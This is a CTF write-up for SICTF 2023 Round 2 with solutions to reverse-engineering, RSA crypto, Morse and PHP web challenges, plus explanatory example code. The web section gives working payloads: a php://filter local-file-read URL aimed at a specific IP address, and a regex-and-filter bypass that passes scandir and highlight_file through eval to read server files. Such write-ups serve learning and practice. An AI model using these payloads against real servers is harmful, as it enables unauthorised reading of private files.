
SICTF2023 #Round 2 writeup + attachments

Attachments: https://github.com/nyyyddddn/ctf/tree/main/Sictf2023 %23Round 2

Reverse

[Sign-in] PYC

pycdc on my machine was broken, so I used an online decompiler instead.

https://www.lddgo.net/string/pyc-compile-decompile

print('SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}')

Myobject

RC4 encryption/decryption; write a script to decrypt it.

def rc4(key, plaintext):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]  # Swap values
    i = 0
    j = 0
    output = []
    for byte in plaintext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]  
        K = S[(S[i] + S[j]) % 256]
        output.append(byte ^ K)

    return output
key = [ord(char) for char in "SIFLAG"]
v18_bytes = (0x47CF225A0ED32730).to_bytes(8, byteorder='little')
ciphertext_v19 = [71, 107, 11, 229, 141, 83, 186, 153, 195, 133, 7]
v20_bytes = (0x9F88FE10771C0107).to_bytes(8, byteorder='little')

full_ciphertext_27 = list(v18_bytes) + ciphertext_v19 + list(v20_bytes)

decrypted_full_combined = rc4(key, full_ciphertext_27)
decrypted_full_combined_string = ''.join([chr(byte) for byte in decrypted_full_combined])
print(decrypted_full_combined_string)

SICTF{wow_you_get_the_flag}

chbase

strcpy(Str2, "F0lWEVA7BmUzAGB0C2UuAU9hbnIpATEidDdnACQ9");

char *sub_411B30()
{
  char *result; // eax

  __CheckForDebuggerJustMyCode(&unk_41C0F5);
  j_strcpy(&Destination, "ZYXWVUTSRQPONMLKJIHGFEDCBAabcdefghijklmnopqrstuvwxyz0123456789+/");
  result = (char *)IsDebuggerPresent();
  if ( result )
    return j_strcpy(&Destination, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
  return result;
}

Swap the index table above in as the Base64 alphabet and it decodes.

http://web.chacuo.net/netbasex

SICTF{base64_and_antidebugger}

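A Different base64 (不一样的base64)

Why is this challenge author so fond of Base64?

The exe is packed with PyInstaller. I tried several projects for extracting the pyc, and this one worked best:

https://github.com/pyinstxtractor/pyinstxtractor-ng/releases/tag/2023.08.20

Then decompile 111.pyc: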

https://www.lddgo.net/string/pyc-compile-decompile

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8

BASE64_CHARS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

def base64_encode(data):
    binary_str = ''.join(format(x, '08b') for x in data)
    padding = len(binary_str) % 24
    if padding != 0:
        binary_str += '0' * (24 - padding)
    result = ''
    for i in range(0, len(binary_str), 6):
        group = binary_str[i:i + 6]
        decimal_val = int(group, 2)
        result += BASE64_CHARS[decimal_val]
    padding_count = (4 - len(result) % 4) % 4
    result += '=' * padding_count
    return result

data = input('').encode()
encoded_data = base64_encode(data)
print(encoded_data)
if encoded_data == 'U0lDVEZ7OGUwZDM1OGQtOGI5ZC00ODY2LTliMDItNjc0OWIwN2FkMDlhfQAA':
    print('True!')

This is Base64 with a swapped table; decode it with this tool:

http://web.chacuo.net/netbasex

SICTF{8e0d358d-8b9d-4866-9b02-6749b07ad09a} is the flag.
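An added example (not the author's code) that decodes both Base64 challenges, chbase and the PyInstaller one, offline instead of through the web tool. The strings and tables are copied from the page; the function names are assumptions of this example. The second encoder keeps the standard table but pads the bit string with zeros, so its output ends in 'A' characters rather than '='.

```python
import base64

STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Table that sub_411B30 installs when no debugger is attached (from the page).
CHBASE_TABLE = "ZYXWVUTSRQPONMLKJIHGFEDCBAabcdefghijklmnopqrstuvwxyz0123456789+/"
CHBASE_STR2 = "F0lWEVA7BmUzAGB0C2UuAU9hbnIpATEidDdnACQ9"
# Target string compared against in the decompiled 111.pyc (from the page).
PYC_TARGET = "U0lDVEZ7OGUwZDM1OGQtOGI5ZC00ODY2LTliMDItNjc0OWIwN2FkMDlhfQAA"


def decode_with_table(text, table=STD):
    """Decode Base64 text that was produced with an arbitrary 64-char table."""
    if len(table) != 64 or len(set(table)) != 64:
        raise ValueError("table must contain 64 distinct characters")
    body = text.rstrip("=")
    unknown = set(body) - set(table)
    if unknown:
        raise ValueError(f"characters not in table: {sorted(unknown)}")
    # Map each symbol to the standard symbol with the same 6-bit index.
    std = body.translate(str.maketrans(table, STD))
    std += "=" * (-len(std) % 4)
    return base64.b64decode(std, validate=True)


def decode_zero_padded(text):
    """Decode output of the page's base64_encode, which zero-pads the bit
    string to a multiple of 24 bits: the tail decodes to NUL bytes.
    Note: this also strips NUL bytes that were genuinely part of the input."""
    return decode_with_table(text).rstrip(b"\x00")


if __name__ == "__main__":
    print(decode_with_table(CHBASE_STR2, CHBASE_TABLE))
    # Debugger path: the standard table is installed and the result is garbage.
    print(decode_with_table(CHBASE_STR2))
    print(decode_zero_padded(PYC_TARGET))
```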

javacode

Crypto

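[Sign-in] Classical Cipher Medley (古典大杂烩)

Emoji encoding; decode it with this tool: http://www.atoolbox.net/Tool.php?Id=937

After that I could not tell what the encoding was. While searching for CTF encoding identification I found this project:

https://github.com/Ciphey/Ciphey This project decoded the rest and produced the flag. For how to use the Docker version, see https://docs.remnux.org/run-tools-in-containers/remnux-containers#ciphey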

SICTF{fe853b49-8730-462e-86f5-fc8e9789f077}

Radio

There are three (n, c) pairs and e is fairly small, so solve it with the Chinese Remainder Theorem.

import gmpy2
import binascii


# Solve the system of congruences with the Chinese Remainder Theorem.
# aList: remainders, mList: moduli
def CRT(aList, mList):
    M = 1
    for i in mList:
        M = M * i  # M = product of all m_i
    x = 0
    for i in range(len(mList)):
        Mi = M // mList[i]  # M_i = M / m_i
        Mi_inverse = gmpy2.invert(Mi, mList[i])  # inverse of M_i modulo m_i
        x += aList[i] * Mi * Mi_inverse  # accumulate each term of x
    x = x % M
    return x


if __name__ == "__main__":
    n1 = "14628911682936716611458501697007036859460044243525290515096052103585430459755335375005202100114469571371360084664887335211277585652711111523095037589648375630146039444071400098427638768750755153219974194380355807078158427824557754939604018020265955042573660474772006646525311705184431094905718137297923127124517126579859336516891364853724635334011666814712424599592662398013241607855160919361308195967978220182785816761656927836373944699635667244275310680450562446433724968942835275279255823144471582249379035668825437133182865600026935116686574740844588839352146024513673500770611055698030333734066230166111140083923"
    n2 = "16756694748293603983474688536179571665757862433174984877308316444468003022266277794769268134195205510197588585566270416339902269736376811449830775290335951504698137924773942880807921752691668522662285163130340474205633998154849689387759453003838730282756734975490180702422176361373516245372635401939755527017589503572550811648345570775428936487145892225736625411540461653083957762795820510109891180906709827194217045059033312564525916136573856999724346161896146703174418039344166251503310869772735585554127509732135494936119159784702673291794381095696332128950979288440758815310482211285712819274848744478643590996499"
    n3 = "12023158079717019193506148537498877243668782424904061914991928068483879707115315968983829360560644394409575645736275352836086080024994045582242629571839276759393418303915955798990522990081795218822313146157773272844272865701134880180795342597049645358985187689813369428579614193015028249821853347208001645148169449968882591709833452960545988520048722323580338213590245476892223967673180144525106292453573842357322398199104132677638909964034937501684668442732786408572501007756270725934445316827054687741612177409932320532825182104820899546084015733164816993674100635828218335112393003462442685677115798304835391938681"
    c1 = "786426913645332991929803636719878643130489430090701482974255190570111407517277263761161970232982615374753982050075781017755721714929721429185828101898786972242994012456972241276851428750970754773002966788642795040933520662931514953660571657013642671173456750800960592586345219252277575624120271330470724245201080094330964145796872211627254805407394764183615099525852600855622089361965086460279057625205099471122036599934609091062009161119885692567925924978687256063116915630947838112126347748759078024890458539541208153526564434483654508834147071166870006117573542198238493913144419569943131642262575848786399020602"
    c2 = "14269311999815379511888097227418748728398011595172649708273598243317106830139061994801598925448165045032084910971094414749744701731066555194159863759072739031915833091715422787808666326235589236328864675164322734119047182014621724868200908222400504845559290620275973427127376594365043386362821355037781568524903149101953873768462097165128186788759111090267131443645126715520994688945363059795513931799317608292977574376954729552861360597103229877031117089231816770880909815561950691603994439997197261395452797893557057320175747162837857668062550646101714062365530246698404923128445182100334335447738834779014705114350"
    c3 = "3204718091370324153305164801961074660508922478706979436653573192321723216725523523538914956544950802616295043619768261075799875855502834749045520466140056621489305006966280527055668378303630674311102581232313032585389907028715671091914904062961720585667564982641321454541632782484415075257140508738041786400512095949826279576159569786734978545737717138115729502475357594151593143140355121154223614868465202149338507796306863351134218879326031985027900678671697876083351974546516576983143592764763925335805465720148057651958521255276602933604064541840892578409973858867533575728482926007556060584654853884046046420855"

    cList = [int(c1), int(c2), int(c3)]
    nList = [int(n1), int(n2), int(n3)]
    m_e = CRT(cList, nList)
    for e in range(17, 18):
        m, f = gmpy2.iroot(m_e, e)  # f is True only when the root is exact
        m = hex(m)[2:]
        if len(m) % 2 == 1:
            m = '0' + m  # left-pad so the hex string holds whole bytes
        flag = binascii.unhexlify(m)
        print(flag)

SICTF{fdc0afb5-1c81-46b9-a28a-241f5f64419d}
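An added example (not the author's script and not the challenge data) of the condition the CRT approach above relies on: the CRT result equals m^e as an integer only while m^e < n1·n2·n3, which is why three pairs can be enough even for e = 17 when the message is short, and why the same recovery fails for a longer message. The moduli and messages are constructed, and all function names are assumptions of this example.

```python
from math import prod


def crt(residues, moduli):
    """Solve x = r_i (mod n_i) for pairwise-coprime n_i, modulo prod(n_i)."""
    N = prod(moduli)
    x = 0
    for r, n in zip(residues, moduli):
        Ni = N // n
        x += r * Ni * pow(Ni, -1, n)  # ValueError if the moduli share a factor
    return x % N


def iroot(x, e):
    """Integer e-th root by bisection: (floor(root), root_is_exact)."""
    lo, hi = 0, 1 << (x.bit_length() // e + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** e <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** e == x


def max_plain_bits(moduli, e):
    """Largest k for which every m < 2**k satisfies m**e < prod(moduli)."""
    return (prod(moduli).bit_length() - 1) // e


def broadcast_recover(cts, moduli, e):
    """Return m if m**e < prod(moduli); None when the CRT value is no e-th power."""
    root, exact = iroot(crt(cts, moduli), e)
    return root if exact else None


# Constructed moduli built from known Mersenne primes, NOT the challenge values.
def mersenne(p):
    return (1 << p) - 1

NS = [mersenne(521) * mersenne(3217), mersenne(607) * mersenne(2203),
      mersenne(1279) * mersenne(2281)]
E = 17
SHORT = b"SICTF{constructed-sample-not-the-real-flag}"  # 43 bytes, 343 bits
LONG = SHORT * 2                                         # 86 bytes, too long


def encrypt_all(msg):
    """Textbook (unpadded) RSA encryption of the same message under every modulus."""
    m = int.from_bytes(msg, "big")
    return m, [pow(m, E, n) for n in NS]
```

With these moduli `max_plain_bits(NS, E)` is 594, so the 43-byte message is recovered while the 86-byte one is not; randomized padding such as OAEP removes the shared-plaintext precondition altogether.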

small_e

from sympy import symbols, Eq, solve


n = 23407088262641313744603678186127228163189328033499381357614318160776774708961658114505773173784501557046914457908828086210961235530240151825359345210845219656000760996670856300710703016947799649686427460688236465568188205550456293373157997725204643414082796492333552579250010906010553831060540937802882205118399938918764313169385349293602085310111289583058965780887097301702677087443291977479125263301000328313103296364864396361278863921717374909215078711198899810620522933994481419395021233240234478331179727351050575360886334237633420906629984625441302945112631166021776379103081857393866576659121443879590011160797

e = 3
c = 1584727211980974717747362694412040878682966138197627512650829607105625096823456063149392973232737929737200028676411430124019573130595696272668927725536797627059576270068695792221537212669276826952363636924278717182163166234322320044764324434683614360641636360301452618063418349310497430566465329766916213742181
m1 = 11658736990073967239197168945911788935424691658202162501032766529463315401599017877851823976178979438592

c1 = pow(m1, e, n)

delta_m_symbol = symbols('delta_m')
polynomial_equation = Eq(c, (m1 + delta_m_symbol)**3)
solutions = solve(polynomial_equation, delta_m_symbol)
m_recovered = m1 + solutions[0]

print(bytes.fromhex(hex(m_recovered)[2:]).decode())

SICTF{2ca8e589-4a31-4909-80f0-9ecfc8f8cb37}

Web

[Sign-in] Include

Requesting http://210.44.151.51:10120/?SICTF=php://filter/read=convert.base64-encode/resource=flag.php reads the following content:

<?php
$file_path = "/flag";
if (file_exists($file_path)) {
    $flag = file_get_contents($file_path);
}
else{
    echo "error";
}

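Visiting flag.php does not print "error", so use the same pseudo-protocol (the php://filter wrapper) to read /flag and get the flag:

http://210.44.151.51:10120/?SICTF=php://filter/read=convert.base64-encode/resource=/flag

Base64-decoding the response gives SICTF{f9bcd5bf-2e28-404c-936c-92d7f0ba2158}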

Baby_PHP

highlight_file(__FILE__);
error_reporting(0);

$query = $_SERVER['QUERY_STRING'];

if (preg_match('/_|%5f|\.|%2E/i', $query)) {
    die('You are Hacker!');
}
if($_GET['k_e_y'] !=='123' && preg_match('/^123$/',$_GET['k_e_y'])){
    echo("You are will Win!<br>");
    if(isset($_POST['command'])){
        $command = $_POST['command'];
        if(!preg_match("/\~|\`|\@|\#|\\$|\%|\&|\*|\(|\)|\-|\+|\=|\{|\}|\[|\]|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i",$command)){
            eval($command);
        }
        else{
            echo("You are Hacker!");
        }
    }
}
else{
    echo("K_e_y is Errors!");
}

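The first preg_match can be bypassed by using a URL-encoded character in place of the underscore (the payload uses %20, because PHP converts a space in a parameter name to an underscore). Then comes the second preg_match.

$_GET[key] is checked with a strict comparison followed by preg_match. After searching for a long time I found that a newline, %0A, bypasses it, because $ in the pattern also matches just before a trailing newline: k%20e%20y=123%0A

In the preg_match on command, the parentheses in the pattern are Chinese (full-width) parentheses, which means function calls are allowed. At first I thought of system() and went looking online for odd shell tricks to get around the filter, but nearly all of the key characters are filtered. Then it occurred to me that since functions can be called, functions could replace the actions that would otherwise be done through the shell.

I found the answer in this article: https://blog.csdn.net/qq_38154820/article/details/107171940?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161461040516780255236081%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=161461040516780255236081&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allbaidu_landing_v2~default-1-107171940.pc_search_result_no_baidu_js&utm_term=%E6%97%A0%E5%8F%82%E6%95%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96

The final payload is: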

?k%20e%20y=123%0A
command=highlight_file(next(array_reverse(scandir(current(localeconv())))));
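An added example (not part of the original writeup) that checks the two validation flaws in the Baby_PHP source from the defender's side. Python's re module treats `$` the same way PCRE does here, so it stands in for preg_match; the function names and the sample input are assumptions of this example.

```python
import re
import unicodedata

# Character list transcribed from the Baby_PHP command filter on this page;
# the two parentheses are the full-width forms U+FF08 / U+FF09.
PAGE_BLOCKLIST = "~`@#$%&*\uff08\uff09-+={}[]:'\",<.>/?\\"
# The same list with look-alike characters folded to their ASCII forms.
FIXED_BLOCKLIST = unicodedata.normalize("NFKC", PAGE_BLOCKLIST)


def key_check_as_written(value):
    """Mirror of: $v !== '123' && preg_match('/^123$/', $v)."""
    return value != "123" and re.search(r"^123$", value) is not None


def key_check_end_anchored(value):
    """Same test with an absolute end anchor (PCRE: \\z or the D modifier).
    It can never pass, which shows the branch depends on the loose anchor."""
    return value != "123" and re.fullmatch(r"123", value) is not None


def lookalikes(chars):
    """Return (char, ascii_form) for non-ASCII characters that NFKC-normalise
    to ASCII, e.g. full-width punctuation pasted into a filter list."""
    found = []
    for ch in chars:
        folded = unicodedata.normalize("NFKC", ch)
        if ch != folded and folded.isascii():
            found.append((ch, folded))
    return found


def is_blocked(command, blocklist):
    """True when the command contains any character from the blocklist."""
    return any(ch in blocklist for ch in command)


if __name__ == "__main__":
    print(key_check_as_written("123\n"), key_check_end_anchored("123\n"))
    print(lookalikes(PAGE_BLOCKLIST))
    sample = "f(x);"  # constructed input containing ASCII parentheses
    print(is_blocked(sample, PAGE_BLOCKLIST), is_blocked(sample, FIXED_BLOCKLIST))
```

Running `lookalikes` over filter patterns in review catches this class of mistake; the durable fix is to drop eval on request data rather than to extend the blocklist.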

MISC

fast_morse

Morse code

..-. ..--- .- ----- ----. -... ..-. -....- --... ..-. ....- .- -....- ....- ..--- -.... ----. -....- ----. ...-- .- ..... -....- -.-. ---.. .- ....- ---.. ...-- -.... ----- -... ----- ...-- -.-.
SICTF{f2a09bf-7f4a-4269-93a5-c8a48360b03c}

Author: nyyyddddn

Link: https://www.cnblogs.com/nyyyddddn/p/17691627.html

Copyright notice: This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 2.5 China Mainland license.
